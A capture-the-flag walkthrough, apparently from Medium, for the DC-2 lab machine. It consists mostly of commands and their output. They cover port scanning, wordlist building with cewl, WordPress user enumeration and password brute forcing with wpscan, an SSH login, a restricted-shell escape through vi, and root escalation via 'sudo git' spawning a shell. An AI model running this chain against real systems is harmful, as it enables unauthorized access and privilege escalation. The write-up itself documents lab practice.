DC-2 ( Walkthrough )

netdiscover -i vboxnet1
nmap -v -sT -p- 192.168.57.106
nmap -v -A -sT -p- 192.168.57.106PORT     STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:05:C7:56 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.001 days (since Fri Feb 21 10:46:09 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
cewl http://dc-2 > pass.txt
wpscan --url dc-2 -e u
wpscan -U admin,jerry,tom --url dc-2 -P pass.txt
ssh tom@192.168.57.106 -p 7744
tom@DC-2:~$ ls -la usr/bin
tom@DC-2:~$ vi
> :set shell=/bin/bash
> :shell
tom@DC-2:~$ export PATH=/bin:/usr/bin/
tom@DC-2:~$ cat flag3.txt
tom@DC-2:~$ su jerry
jerry@DC-2:/home/tom$ sudo -l
cat flag4.txt 
jerry@DC-2:~$ sudo git -p --help
> !/bin/bash
root@DC-2:/home/jerry# id
root@DC-2:/home/jerry# cd | ls
root@DC-2:~# cat final-flag.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store